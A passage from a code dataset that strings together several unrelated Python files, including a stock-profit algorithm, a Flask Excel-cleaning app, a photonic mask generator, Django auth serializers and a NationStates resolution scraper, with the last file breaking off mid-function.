<reponame>alvinctk/google-tech-dev-guide def maxProfitWithKTransactions(prices, k): n = len(prices) profit = [[0]*n for _ in range(k+1)] """ t := number of transactions d := day at which either buy/sell stock profit[t][d] = max ( previous day profit = profit[t][d-1] , profit sold at this day + max(buy for this transaction + profit at last transaction) prices[d] + max(-prices[x] + profit[t-1][x], where 0 <= x < d) """ if not prices: return 0 for t in range(1, k+1): for d in range(1, n): previous_day_profit = profit[t][d-1] max_profit_buy_on_t = float("-inf") for x in range(0, d): max_profit_buy_on_t = max(max_profit_buy_on_t, -prices[x] + profit[t-1][x]) profit[t][d] = max(previous_day_profit, prices[d] + max_profit_buy_on_t) debug = False if debug: print(prices) for row in profit: print(row) print("Maximum profit for k={} transaction for {} stock prices at each day = {}".format(k, prices, profit[-1][-1] if profit else 0)) return profit[-1][-1] if __name__ == "__main__": maxProfitWithKTransactions([5, 11, 3, 50, 60, 90], 2)
3.625
4
main.py
rdmaulana/flask-smart-xls-clean
0
11832
<filename>main.py import pandas as pd import numpy as np import io import time import uuid from flask import Flask, render_template, request, redirect, url_for, Response, session, send_file, make_response, send_from_directory from os.path import join, dirname, realpath from werkzeug.wsgi import FileWrapper app = Flask(__name__) app.config["DEBUG"] = True app.config["UPLOAD_FOLDER"] = 'media/dataset' app.config["EXPORT_FOLDER_CSV"] = 'media/result' app.config["SECRET_KEY"] = '<KEY>' app.config['SESSION_TYPE'] = 'filesystem' @app.route('/') def index(): return render_template('index.html') @app.route("/", methods=['POST']) def uploadExcel(): start_id = request.form['id'] uploaded_file = request.files['file'] if uploaded_file.filename != '': file_path = join(app.config['UPLOAD_FOLDER'], uploaded_file.filename) uploaded_file.save(file_path) cleanExcel(file_path, start_id) csv_name = session['csv_name'] return redirect(url_for('success', file_id=csv_name)) else: return redirect(url_for('index')) @app.route('/export/<file_id>', methods=['GET','POST']) def success(file_id): filename = session['csv_name'] if "csv_name" in session else "" return render_template('success.html', filename=file_id) @app.route('/downloads/<path:filename>', methods=['GET','POST']) def download(filename): uploads = join(app.root_path, app.config['EXPORT_FOLDER_CSV']) return send_from_directory(directory=uploads, filename=filename) def cleanExcel(file_path, start_id): xls = pd.read_excel(file_path) xls.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=["",""], regex=True) print("Jumlah awal: {}".format(xls.shape)) xls.rename(columns = { 'NIK':'nik', 'NAMA':'nama', 'JENIS_KELAMIN':'jkel', 'TANGGAL_LAHIR':'tgl_lahir', 'NO_HP':'telp', 'INSTANSI_PEKERJAAN':'instansi', 'ALAMAT KTP': 'alamat', 'ALAMAT_KTP': 'alamat', 'KODE_KAB_KOTA_TEMPAT_KERJA': 'kab_id', 'KODE_KATEGORI': 'kategori' }, inplace = True) xls['nik'] = xls['nik'].astype(str) xls.insert(0, 'id', range(int(start_id), int(start_id) + len(xls))) xls.insert(2, 'nama_ktp', xls['nama']) xls.insert(6, 'status', 0) # del xls['NO'] del xls['UMUR'] del xls['JENIS_PEKERJAAN'] xls.drop(xls[xls['tgl_lahir'].isnull()].index, inplace = True) xls.drop(xls[xls['nik'].isnull()].index, inplace = True) xls.drop(xls[xls['nik'].str.len() > 16].index, inplace = True) xls.drop(xls[xls['nik'].str.len() < 16].index, inplace = True) xls.drop(xls[xls.duplicated(['nik'])].index, inplace = True) if xls['tgl_lahir'].dtypes == 'object': xls['tgl_lahir'] = pd.to_datetime(xls['tgl_lahir']) if xls['telp'].dtypes == 'float64': xls['telp'] = xls['telp'].astype(str) xls['telp'] = xls['telp'].str.split('.').str[0] xls['telp'] = xls['telp'].replace('nan',np.NaN) xls['telp'] = '0' + xls['telp'] if xls['telp'].dtypes == 'object': xls['telp'] = xls['telp'].str.split('/').str[0] xls['telp'] = xls['telp'].str.replace('\+62','0') xls['telp'] = xls['telp'].str.replace(' ','') xls['telp'] = xls['telp'].str.replace('-','') if xls['kab_id'].dtypes == 'float64': xls['kab_id'] = xls['kab_id'].astype(str) xls['kab_id'] = xls['kab_id'].str.split('.').str[0] xls['kab_id'] = xls['kab_id'].replace('nan',np.NaN) if xls['kategori'].dtypes == 'int64': xls['kategori'] = xls['kategori'].astype(str) xls['kategori'] = xls['kategori'].apply(lambda x: '0' + x if len(x) == 1 else x) xls['alamat'] = xls['alamat'].replace(';','') print("Jumlah akhir: {}".format(xls.shape)) uid = str(uuid.uuid4())[:4] path_file = 'media/result/' outfile_name = '{0}{1}'.format(time.strftime("%Y%m%d-%H%M%S-"),uid) session['csv_name'] = f'{outfile_name}' xls.to_csv(f'{path_file}{outfile_name}.csv', index=False, header=True, encoding="utf-8") if __name__ == '__main__': app.run(debug=True)
2.46875
2
2_UNIXCommands/Exercise11.py
takeyoshinitta/NLP-100-Exercise
3
11833
# 11. Replace tabs into spaces # Replace every occurrence of a tab character into a space. Confirm the result by using sed, tr, or expand command. with open('popular-names.txt') as f: for line in f: print(line.strip().replace("\t", " "))
3.28125
3
scripts/wapo/wapo_link_graph_from_mongo.py
feup-infolab/army-ant
5
11834
<filename>scripts/wapo/wapo_link_graph_from_mongo.py #!/usr/bin/env python # # wapo_link_graph_from_mongo.py # <NAME> <<EMAIL>> # 2019-02-05 import logging import sys import warnings import networkx as nx from bs4 import BeautifulSoup from pymongo import MongoClient logging.basicConfig( format='%(asctime)s wapo_link_graph_from_mongo: %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) < 3: print("Usage: %s MONGO_DBNAME OUTPUT_GRAPH_PATH" % sys.argv[0]) sys.exit(1) database = sys.argv[1] output_graph_path = sys.argv[2] mongo = MongoClient() db = mongo[database] def document_iterator(): for doc in db.articles.find(): yield doc for doc in db.blog_posts.find(): yield doc logging.info("Extracting anchors from content elements (using article_url as node ID) and building graph") g = nx.DiGraph() doc_count = 0 edge_count = 0 attr_keys = ['id', 'title', 'article_url', 'published_date', 'author', 'type'] for source in document_iterator(): if not 'contents' in source or source.get('contents') is None: continue for par in source['contents']: if par is None: continue html = par.get('content') if html is None: continue html = str(html) soup = BeautifulSoup(html, 'lxml') anchors = soup.find_all('a') for a in anchors: target_url = a.attrs.get('href') if target_url is None: continue query = {'article_url': target_url} attr_selector = { '_id': -1, 'id': 1, 'article_url': 1, 'title': 1, 'published_date': 1, 'author': 1, 'type': 1} target = db.articles.find_one(query, attr_selector) \ or db.blog_posts.find_one(query, attr_selector) if target is None: continue # graph[source_url].add(target_url) g.add_node( source['id'], **{k.replace('_', ''): source[k] for k in attr_keys if not source[k] is None}) g.add_node( target['id'], **{k.replace('_', ''): target[k] for k in attr_keys if not target[k] is None}) g.add_edge(source['id'], target['id']) edge_count += 1 doc_count += 1 if doc_count % 1000 == 0: logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count)) logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count)) logging.info("Saving graph to %s" % output_graph_path) if output_graph_path.endswith('.gml') or output_graph_path.endswith('.gml.gz'): nx.write_gml(g, output_graph_path) else: nx.write_graphml(g, output_graph_path)
2.65625
3
designScripts/vernierMask.py
smartalecH/BYUqot
5
11835
<gh_stars>1-10 # ------------------------------------------------------------------ # # vernierMask.py # ------------------------------------------------------------------ # # # A mask design used to align the 3D printer to a silicon photonic chip # # ------------------------------------------------------------------ # # VERSION HISTORY # 10 Apr 2018 - AMH - Initialization # # ------------------------------------------------------------------ # # ------------------------------------------------------------------ # # Import libraries # ------------------------------------------------------------------ # # Get project library path to import library files import sys import os d = os.path.dirname(os.getcwd()) libPath = os.path.abspath(os.path.join(d, 'lib')) sys.path.insert(0, libPath) # Import all other libraries import gdspy import numpy as np import objectLibrary as obLib # ------------------------------------------------------------------ # # Design Constants # ------------------------------------------------------------------ # # Cell parameters layerNumber = 1 # Vernier mask design parameters (all values in microns) numFingers = 10 # Number of fingers to have on top and bottom fingerWidth = 30 # Width of each finger fingerSpacing = 40 # Spacing between fingers longFingerLength = 200; # Length of the long, middle finger shortFingerLength = 150; # Length of the short, outer fingers baseThickness = 76; # Thickness of edge border of design separationDistance = 380 # distance from edge of pattern to origin buffer = 50 # Kerf width of blade innerBoxWidth = 8.78e3 # Actual dimensions of chip outerBoxWidth = innerBoxWidth + buffer # Buffered chip size numCells = 12 # number of repeated cells in each dimension # Now create a series of functions that return a cell. We'll leverage the recursive # nature of GDS files to keep things simple. # ------------------------------------------------------------------ # # Create single Vernier pattern # ------------------------------------------------------------------ # def vernier(): # Intialize cell vernierCell = gdspy.Cell('vernier') # Calculate properties vernierWidth = (longFingerLength + baseThickness) vernierHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers xCenter = -(vernierWidth/2 - baseThickness) # First, place the long finger in the middle vernierCell.add(gdspy.Rectangle([xCenter, -fingerWidth/2], [xCenter+longFingerLength, fingerWidth/2],layer=layerNumber)) # Next, iterate through and place the other fingers for k in range(1,numFingers+1): # Add top fingers vernierCell.add(gdspy.Rectangle( [xCenter, fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1)], [xCenter+shortFingerLength,fingerWidth/2 + fingerSpacing*k +fingerWidth*k], layer=layerNumber)) # Add bottom fingers vernierCell.add(gdspy.Rectangle( [xCenter, -(fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1))], [xCenter+shortFingerLength,-(fingerWidth/2 + fingerSpacing*k +fingerWidth*k)], layer=layerNumber)) # Finally, add the edge baseHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers vernierCell.add(gdspy.Rectangle([-vernierWidth/2, baseHeight/2], [xCenter, -baseHeight/2],layer=layerNumber)) # Now let's flatten vernierCell.flatten() # Return the cell return vernierCell # ------------------------------------------------------------------ # # Create 2D Vernier pattern from single pattern # ------------------------------------------------------------------ # def vernier2D(): # Intialize 2D cell vernier2DCell = gdspy.Cell('vernier2D') # Initialize 1D cell vernierCell = vernier() # Get vernier dimensions vernierDims = vernierCell.get_bounding_box() vernierWidth = abs(vernierDims[0,0] - vernierDims[1,0]) vernierHeight = abs(vernierDims[0,1] - vernierDims[1,1]) # Place one Vernier pattern in the x direction xCell = gdspy.CellReference(vernierCell,rotation=-90) xCell.translate(-(vernierHeight/2 + separationDistance),-vernierWidth/2) vernier2DCell.add(xCell) # Place another Vernier pattern in the y direction yCell = gdspy.CellReference(vernierCell,rotation=180) yCell.translate(-vernierWidth/2,-(vernierHeight/2 + separationDistance)) vernier2DCell.add(yCell) # Return final cell return vernier2DCell # ------------------------------------------------------------------ # # Create Box outline # ------------------------------------------------------------------ # def boxOutline(): # initialize cell outlineCell = gdspy.Cell('outline') # define an outer box outerBox = gdspy.Rectangle([-outerBoxWidth/2,-outerBoxWidth/2], [outerBoxWidth/2,outerBoxWidth/2],layer=layerNumber) # define an inner box innerBox = gdspy.Rectangle([-innerBoxWidth/2,-innerBoxWidth/2], [innerBoxWidth/2,innerBoxWidth/2],layer=layerNumber) # now subtract the two outline = gdspy.fast_boolean(outerBox,innerBox,'xor',layer=layerNumber) # update the cell outlineCell.add(outline) # return the cell return outlineCell # ------------------------------------------------------------------ # # Create Single Chip # ------------------------------------------------------------------ # def vernierChip(): # Initialize cells vernierChipCell = gdspy.Cell('vernierChip') vernier2DCell = vernier2D() boxOutlineCell = boxOutline() # Add border first vernierChipCell.add(gdspy.CellReference(boxOutlineCell,(0,0))) chipDims = vernierChipCell.get_bounding_box() chipWidth = abs(chipDims[0,0] - chipDims[1,0]) # Now iterate through placing corners thetaPos = [45, 135, -135, -45] thetaRot = [0, 90, 180, -90] for k in range(0,4): xPos = np.sign(np.cos(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2) yPos = np.sign(np.sin(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2) vernierChipCell.add(gdspy.CellReference(vernier2DCell,(xPos,yPos),rotation=thetaRot[k])) # return cell return vernierChipCell # ------------------------------------------------------------------ # # Tapeout entire wafer # ------------------------------------------------------------------ # def vernierMask(): # Initialize cells vernierMaskCell = gdspy.Cell('vernierMask') vernierChipCell = vernierChip() # Get chip dimensions chipDims = vernierChipCell.get_bounding_box() chipWidth = abs(chipDims[0,0] - chipDims[1,0]) # Get mask center center = (numCells * chipWidth) / 2 # Let's make an array vernierMaskCell.add(gdspy.CellArray( vernierChipCell, numCells, numCells, (chipWidth, chipWidth), (-center, -center) )) # return final cell return vernierMaskCell # ------------------------------------------------------------------ # # OUTPUT # ------------------------------------------------------------------ # vernierMask() # Output the layout to a GDSII file (default to all created cells). # Set the units we used to micrometers and the precision to nanometers. filename = 'vernierMask.gds' outPath = os.path.abspath(os.path.join(d, 'GDS/'+filename)) gdspy.write_gds(outPath, unit=1.0e-6, precision=1.0e-9)
1.929688
2
src/core/serializers.py
pradipta/back-end
17
11836
from django.contrib.auth import get_user_model from rest_auth.registration.serializers import ( RegisterSerializer as BaseRegisterSerializer, ) from rest_auth.registration.serializers import ( SocialLoginSerializer as BaseSocialLoginSerializer, ) from rest_auth.serializers import LoginSerializer as BaseLoginSerializer from rest_auth.serializers import ( PasswordResetConfirmSerializer as BasePasswordResetConfirmSerializer, ) from rest_auth.serializers import UserDetailsSerializer as BaseUserDetailsSerializer from rest_framework import serializers from rest_framework.exceptions import ValidationError from core.models import Profile # noinspection PyAbstractClass class LoginSerializer(BaseLoginSerializer): """ Extends the default LoginSerializer in order to return custom error messages """ def validate(self, attrs): try: return super().validate(attrs) except serializers.ValidationError as ex: ex.detail = "The email or password you entered is incorrect!" raise ex # noinspection PyAbstractClass class PasswordResetConfirmSerializer(BasePasswordResetConfirmSerializer): """ Extends the default PasswordResetConfirmSerializer in order to return custom error messages """ def validate(self, attrs): try: return super().validate(attrs) except serializers.ValidationError as ex: if "new_password2" in ex.detail: ex.detail = ex.detail["new_password2"][0] else: ex.detail = "Could not reset password. Reset token expired or invalid." raise ex # noinspection PyAbstractClass class CustomSocialLoginSerializer(BaseSocialLoginSerializer): """ Extends default SocialLoginSerializer to add additional details to some failed login attempts """ def validate(self, attrs): try: res = super().validate(attrs) return res except ValidationError as ex: if "User is already registered with this e-mail address." in ex.detail: ex.detail[0] = ( "User is already registered with this e-mail address. " "Please login using the form above." ) raise ex # noinspection PyAbstractClass class RegisterSerializer(BaseRegisterSerializer): email = serializers.EmailField(required=True) password = serializers.CharField(write_only=True) first_name = serializers.CharField(write_only=True) last_name = serializers.CharField(write_only=True) # legacy compat zip = serializers.CharField(write_only=True, required=False) zipcode = serializers.CharField(write_only=True, required=False) # Overrides the default required password fields password1 = None password2 = None def get_cleaned_data(self): return { "username": self.validated_data.get("email", ""), "email": self.validated_data.get("email", ""), # allauth uses password1 internally for creation "password1": self.validated_data.get("password", ""), "first_name": self.validated_data.get("first_name", ""), "last_name": self.validated_data.get("last_name", ""), "zipcode": self.validated_data.get("zipcode", ""), } def validate(self, data): return data UserModel = get_user_model() class ProfileSerializer(serializers.ModelSerializer): class Meta: model = Profile fields = "__all__" class UserDetailsSerializer(BaseUserDetailsSerializer): profile = ProfileSerializer() class Meta: model = UserModel fields = ("username", "email", "first_name", "last_name", "profile") read_only_fields = ("email",) def to_representation(self, instance: UserModel) -> dict: """Move fields from Profile to user representation.""" representation = super().to_representation(instance) profile = representation.pop("profile") representation["zipcode"] = profile["zipcode"] representation["is_mentor"] = profile["is_mentor"] return representation class UserSerializer(BaseUserDetailsSerializer): profile = ProfileSerializer() class Meta: model = UserModel fields = ("username", "email", "first_name", "last_name", "profile") read_only_fields = ("email",) def to_representation(self, instance: UserModel) -> dict: """Move fields from Profile to user representation.""" representation = super().to_representation(instance) profile = representation.pop("profile") profile.pop("user") for key, val in profile.items(): representation[key] = val return representation
2.15625
2
src/programy/brainfactory.py
motazsaad/fit-bot-fb-clt
0
11837
<filename>src/programy/brainfactory.py """ Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from programy.brain import Brain from programy.utils.classes.loader import ClassLoader from abc import abstractmethod, ABCMeta class BrainSelector(object): __metaclass__ = ABCMeta def __init__(self, configuration): self._configuration = configuration @abstractmethod def select_brain(self, brains): raise NotImplementedError() class DefaultBrainSelector(BrainSelector): def __init__(self, configuration, brains): BrainSelector.__init__(self, configuration) self._brains = brains self._iterator = None self._set_iterator() def _set_iterator(self): if self._brains: self._iterator = iter(self._brains.values()) def select_brain(self): try: if self._iterator: return next(self._iterator) except StopIteration: self._set_iterator() try: if self._iterator: return next(self._iterator) except StopIteration: pass return None class BrainFactory(object): def __init__(self, bot): self._brains = {} self._brain_selector = None self.loads_brains(bot) self.load_brain_selector(bot.configuration) def brainids(self): return self._brains.keys() def brain(self, id): if id in self._brains: return self._brains[id] else: return None def loads_brains(self, bot): for config in bot.configuration.configurations: brain = Brain(bot, config) self._brains[brain.id] = brain def load_brain_selector(self, configuration): if configuration.brain_selector is None: self._brain_selector = DefaultBrainSelector(configuration, self._brains) else: try: self._brain_selector = ClassLoader.instantiate_class(configuration.brain_selector)(configuration, self._brains) except Exception as e: self._brain_selector = DefaultBrainSelector(configuration, self._brains) def select_brain(self): return self._brain_selector.select_brain() def get_question_counts(self): brains = [] for brainid, brain in self._brains.items(): brains.append({"id": brainid, "questions": brain.num_questions}) return brains
2.09375
2
tools/docs/generate_api_rst.py
dcillera/envoy
17,703
11838
import os import shutil import sys import tarfile def include_package(envoy_api_protos, rst_file_path, prefix): # `envoy_api_rst_files` is a list of file paths for .proto.rst files # generated by protodoc # # we are only interested in the proto files generated for envoy protos, # not for non-envoy dependencies if ("pkg/" + prefix) not in rst_file_path: return None # derive the "canonical" path from the filepath canonical = f"{rst_file_path.split('pkg/' + prefix)[1]}" # we are only interested in the actual v3 protos, not their dependencies if (prefix + canonical) not in envoy_api_protos: return None return canonical def main(): proto_srcs = sys.argv[1] envoy_api_rst_files = sys.argv[1:-1] output_filename = sys.argv[-1] with open(proto_srcs) as f: # the contents of `proto_srcs` are the result of a bazel genquery, # containing bazel target rules, eg: # # @envoy_api//envoy/watchdog/v3:abort_action.proto # # this transforms them to a list with a "canonical" form of: # # envoy/watchdog/v3/abort_action.proto.rst # envoy_api_protos = [ f"{src.split('//')[1].replace(':', '/')}.rst" for src in f.read().split("\n") if src ] for rst_file_path in envoy_api_rst_files: canonical = include_package(envoy_api_protos, rst_file_path, "envoy/") if canonical is None: canonical = include_package(envoy_api_protos, rst_file_path, "contrib/envoy/") if canonical is None: continue target = os.path.join("rst-out/api-v3", canonical) if not os.path.exists(os.path.dirname(target)): os.makedirs(os.path.dirname(target)) shutil.copy(rst_file_path, target) # output the generated rst files to a tarfile for consumption # by other bazel rules with tarfile.open(output_filename, "w") as tar: tar.add("rst-out", arcname=".") if __name__ == "__main__": main()
2.171875
2
src/wa_parser.py
ifly6/NS-WA-Authorboards
0
11839
<reponame>ifly6/NS-WA-Authorboards # Copyright (c) 2020 ifly6 import html import io import re from datetime import datetime from functools import cache from typing import Tuple import numpy as np import pandas as pd import requests from bs4 import BeautifulSoup from lxml import etree from pytz import timezone from ratelimit import limits, sleep_and_retry from helpers import ref from src import wa_cacher """ Imperium Anglorum: This is adapted from proprietary InfoEurope code which in part does most of this already. Eg the proposal portions which translate, the locality adjustments, API reading, etc. There is also code in beta (not-in-production) which would have done this entirely, but I never got around to developing the VIEWS for that portion of the website. It seems much easier just to commit something like this given that all the code is already present. See ifly6.no-ip.org for more information. """ _headers = { 'User-Agent': 'WA parser (Auralia; Imperium Anglorum)' } class ApiError(Exception): pass @sleep_and_retry @limits(calls=25, period=30) # 50 calls every 30 seconds they say but somehow this is fake news def call_api(url) -> str: response = requests.get(url, headers=_headers) if response.status_code != 200: raise ApiError('{} error at api url: {}'.format(response.status_code, str(url))) return response.text def clean_chamber_input(chamber): """ Turns ambiguous chamber information into tuple (int, str) with chamber id and chamber name """ if type(chamber) == str: if chamber == '1': chamber = 1 elif chamber == '2': chamber = 2 elif chamber == 'GA': chamber = 1 elif chamber == 'SC': chamber = 2 chamber_name = 'GA' if chamber == 1 else \ 'SC' if chamber == 2 else '' return chamber, chamber_name def localised(dt: 'datetime', tz='US/Eastern'): return timezone(tz).localize(dt) @cache def _category_map(): d = {'Advancement of Industry': 'Environmental Deregulation', 'Civil Rights': 'Mild', 'Human Rights': 'Mild', 'Education and Creativity': 'Artistic', 'Environmental': 'Automotive', 'Free Trade': 'Mild', 'Furtherment of Democracy': 'Mild', 'Global Disarmament': 'Mild', 'Health': 'Healthcare', 'International Security': 'Mild', 'Moral Decency': 'Mild', 'Political Stability': 'Mild', 'Regulation': 'Consumer Protection', 'Gun Control': 'Tighten', 'Social Justice': 'Mild'} return {ref(k): v for k, v in d.items()} # force ref name for matching # nb that this is identical to dict( ( ref(k), v ) for k, v in d.items() ) def _translate_category(category: str, s: str) -> Tuple[bool, str]: if ref(category) in _category_map() and s == '0': return True, _category_map()[ref(category)] # yield correct name from ref name of category # if it isn't 0, then it doesn't apply, return given # if not in the list, return given return False, s def capitalise(s): s = s.replace('_', ' ').strip() # exceptions capitalisation_exceptions = wa_cacher.load_capitalisation_exceptions() for i in capitalisation_exceptions: if s.strip().lower() == i.strip().lower(): return i # replace with manual correction # only capitalise words longer than 2 letters ('new') and always capitalise first # unless the word is in given list # > fanboys & the s = " ".join( w.capitalize() if (len(w) > 2 and w not in ['for', 'and', 'nor', 'but', 'yet', 'the']) or (i == 0) else w for i, w in enumerate(s.split()) ).strip() # avoid apostrophe capitalisations # but capitalise st -> St for exception in ['St']: s = ' '.join((exception if w.lower() == exception.lower() else w) for w in s.split()) # for split in ['-']: # # as first should always be capitalised, not checking doesn't matter # s = split.join(w[:1].upper() + w[1:] for i, w in enumerate(s.split(split))) # capitalise first letter only # "<NAME>" # python str.capitalize forces all other chars to lower # don't use str.capitalize above for numeral in ['ii', 'iii', 'iv', 'v', 'vi', 'vii', 'viii', 'ix', 'x']: s = re.sub(r'(?<=\s){}$'.format(numeral), numeral.upper(), s) # matches only trailing numerals # people used to use WA missions; capitalise these, they are separate words s = re.sub(r'(?<=\s)(Wa|wa|wA)(?=\s)', 'WA', s) # if between two spaces s = re.sub(r'^(Wa|wa|wA)(?=\s)', 'WA', s) # if at start (eg WA Mission of NERV-UN) return s def _get_council(i): if i == 'GA' or i == 1: return 'GA' if i == 'SC' or i == 2: return 'SC' if i == 'UN' or i == 0: return 'UN' raise ValueError(f'provided council code {i} is invalid') class WaPassedResolution: def __init__(self, **kwargs): # core vote information self.resolution_num = None self.title = None self.implementation = None # category and strength self.chamber = None self.category = None self.strength = None # handle repeals self.is_repealed = None self.repealed_by = None self.is_repeal = None self.repeals = None # text self.text = None # ancillary information self.author = None self.coauthor0 = None self.coauthor1 = None self.coauthor2 = None self.votes_for = None self.votes_against = None self.council = None self.__dict__.update(kwargs) # django does this automatically, i'm not updating it; lazy @staticmethod def parse_ga(res_num, council=1): from src.wa_cacher import Cacher try: cacher = Cacher.load() except FileNotFoundError: cacher = Cacher() # init new api_url = 'https://www.nationstates.net/cgi-bin/api.cgi?wa={}&id={}&q=resolution'.format(council, res_num) in_cacher = cacher.contains(api_url) if not in_cacher: this_response = call_api(api_url) cacher.update(api_url, this_response) else: this_response = cacher.get(api_url) xml = etree.parse(io.StringIO(this_response)) if not xml.xpath('/WA/RESOLUTION/NAME'): raise ValueError(f'resolution number {res_num} is invalid; no such resolution exists') resolution_is_repealed = xml.xpath('/WA/RESOLUTION/REPEALED_BY') != [] resolution_is_a_repeal = xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID') != [] resolution_text = html.unescape(xml.xpath('/WA/RESOLUTION/DESC')[0].text) resolution_author = xml.xpath('/WA/RESOLUTION/PROPOSED_BY')[0].text print(resolution_author) print(type(resolution_author)) if resolution_author is None or str(resolution_author).strip() == '': raise RuntimeError('resolution author is empty') author = capitalise(resolution_author) resolution = WaPassedResolution( council=_get_council(council), resolution_num=res_num, title=xml.xpath('/WA/RESOLUTION/NAME')[0].text, implementation=localised( datetime.utcfromtimestamp(int(xml.xpath('/WA/RESOLUTION/IMPLEMENTED')[0].text)), 'UTC' ).astimezone(timezone('US/Eastern')), # convert to eastern time chamber=clean_chamber_input(xml.xpath('/WA/RESOLUTION/COUNCIL')[0].text)[1], category=capitalise(xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text), strength=capitalise( _translate_category( xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text, # category xml.xpath('/WA/RESOLUTION/OPTION')[0].text # option )[1] # get name ), is_repealed=resolution_is_repealed, repealed_by=int(xml.xpath('/WA/RESOLUTION/REPEALED_BY')[0].text) if resolution_is_repealed else None, is_repeal=resolution_is_a_repeal, repeals=int(xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID')[0].text) if resolution_is_a_repeal else None, # text and author text=resolution_text.strip(), author=author.strip(), # vote data votes_for=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_FOR')[0].text), votes_against=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_AGAINST')[0].text) ) assert resolution.strength != '0', 'resolution {} has strength 0 with category {}'.format( resolution.title, resolution.category ) # overwrite category if repeal with the repeals field; NS API is broken sometimes for some reason if resolution_is_a_repeal: resolution.strength = str(int(resolution.repeals)) # cast to integer # check for co-authors coauth_list = xml.xpath('/WA/RESOLUTION/COAUTHOR/N') if len(coauth_list) != 0: print('received from API coauthors: {}'.format( ', '.join([capitalise(n.text) for n in coauth_list]) )) try: resolution.coauthor0 = capitalise(coauth_list[0].text) except IndexError: pass try: resolution.coauthor1 = capitalise(coauth_list[1].text) except IndexError: pass try: resolution.coauthor2 = capitalise(coauth_list[2].text) except IndexError: pass else: cleaned_resolution_text = resolution_text \ .replace('[i]', '').replace('[/i]', '') \ .replace('[b]', '').replace('[/b]', '') \ .replace('[u]', '').replace('[/u]', '') coauthor_matches = [s for s in cleaned_resolution_text.splitlines() if re.search( r'(Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:?)|' r'(This resolution includes significant contributions made by\s+)', s, re.IGNORECASE )] if len(coauthor_matches) > 0: coauthor_line = re.sub(r'Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:? ', repl='', string=coauthor_matches[0], flags=re.IGNORECASE) print(f'\tidentified coauthor line: "{coauthor_line}"') coauthor_line = coauthor_line \ .replace('[i]', '') \ .replace('[/i]', '') \ .replace('[b]', '') \ .replace('[/b]', '') \ .replace('[u]', '') \ .replace('[/u]', '') if '[nation' in coauthor_line.lower(): # scion used the [Nation] tag instead of lower case once amended_line = re.sub(r'(?<=\[nation)=(.*?)(?=\])', '', coauthor_line.lower()) # remove 'noflag' etc coauthors = re.findall(r'(?<=\[nation\])(.*?)(?=\[/nation\])', amended_line.lower()) else: # this will break with names like "Sch'tz and West Runk'land" coauthors = re.split(r'(,? and )|(, )', coauthor_line, re.IGNORECASE) coauthors = [i for i in coauthors if i is not None and i.strip() != 'and'] # post facto patching... coauthors = [ref(s).replace('.', '') for s in coauthors] # cast to reference name print(f'\tidentified coauthors as {coauthors}') # pass each co-author in turn ''' While it could be changed so that the original line's capitalisation is preserved, doing this might introduce inconsistency in capitalisation of the same nation. Eg '[nation]imperium_anglorum[/nation]' would be done under capitalisation rules while something provided as 'Imperium ANGLORUM' would be let through. Because some authors use a ref'd name IN the nation tags, something like [nation]transilia[/nation] cannot be disentangled from 'Transilia' if the former is proper and the latter is not. A proper-capitalisation dictionary would be necessary and I am unwilling to download and parse all historical daily dumps for something this minor. ''' try: resolution.coauthor0 = capitalise(coauthors[0]) except IndexError: pass try: resolution.coauthor1 = capitalise(coauthors[1]) except IndexError: pass try: resolution.coauthor2 = capitalise(coauthors[2]) except IndexError: pass cacher.save() return resolution def get_count() -> int: soup = BeautifulSoup(call_api('http://forum.nationstates.net/viewtopic.php?f=9&t=30'), 'lxml') resolution = soup.select('div#p310 div.content a') return len(resolution) def parse() -> 'pd.DataFrame': # find the number of resolutions from Passed GA Resolutions passed_res_max = get_count() print(f'found {passed_res_max} resolutions') # confirm that we have X resolutions res_list = [] max_res = -1 for i in range(passed_res_max - 1, passed_res_max + 20): # passed resolutions should never be more than 20 behind try: print(f'gettingGA {i + 1} of {passed_res_max} predicted resolutions') d = WaPassedResolution.parse_ga(i + 1).__dict__ # note that 0 returns resolution at vote, need to 1-index res_list.append(d) except ValueError: print('out of resolutions; data should be complete') max_res = i break print(f'found {max_res} resolutions; getting historical') # get API information for each resolution for i in reversed(range(0, passed_res_max - 1)): # passed_res_max is already called above print(f'got {max_res - passed_res_max + i} of {max_res} resolutions') print(f'getting GA {i + 1}') r = WaPassedResolution.parse_ga(i + 1) # note that 0 returns resolution at vote, need to 1-index d = r.__dict__ # hacky cheating to get into dict res_list.append(d) # put it up in pandas df = pd.DataFrame(res_list).replace({None: np.nan}) df.drop(columns=['text'], inplace=True) df.rename(columns={ 'council': 'Council', # Auralia used these names for columns 'resolution_num': 'Number', 